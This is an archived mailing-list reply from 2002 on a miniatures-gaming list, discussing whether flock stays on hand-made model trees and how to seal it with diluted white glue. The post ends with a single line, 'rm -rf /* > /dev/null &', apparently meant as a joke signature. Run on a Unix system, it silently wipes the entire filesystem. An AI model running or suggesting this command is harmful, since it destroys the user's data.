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Re: [SGII], [DSII] Can't see the forest for the....

From: Jim Callahan <jim.callahan2@g...>
Date: Fri, 04 Jan 2002 12:20:44 -0600
Subject: Re: [SGII], [DSII] Can't see the forest for the....

actually, we haven't had aproblem with the flock rubbing off. I usu. 
pick them up by the 'branches' anyway (not on purpose, they just lend 
themselves to it) and throw them in a box.  The flock seems to stay on 
pretty well.  

I don't really like the look of  pvc covered flock.  IMHO it is a little


Diamond wrote:

> At 09:57 PM 1/3/02 -0500, you wrote:
>> At 12:37 AM 1/3/02 -0600, you wrote:
>> >look here for my trees, you have to see these to believe them
>> >Currently I have some smaller for DSII and a couple of 25-8 mm sized

>> ones
>> >
>> >
>> They look good -- how durable are they?  I would expect the flock to
>> off pretty quickly -- it would if *I* made them, at least....
>> John Crimmins
> I would coat them with some watered down Elmer's glue-all (the white 
> stuff, aka pvc glue IIRC). No more shedding flock. I have flocked 
> hills done up this way and they stand up to abuse quite well.

rm -rf /* > /dev/null &

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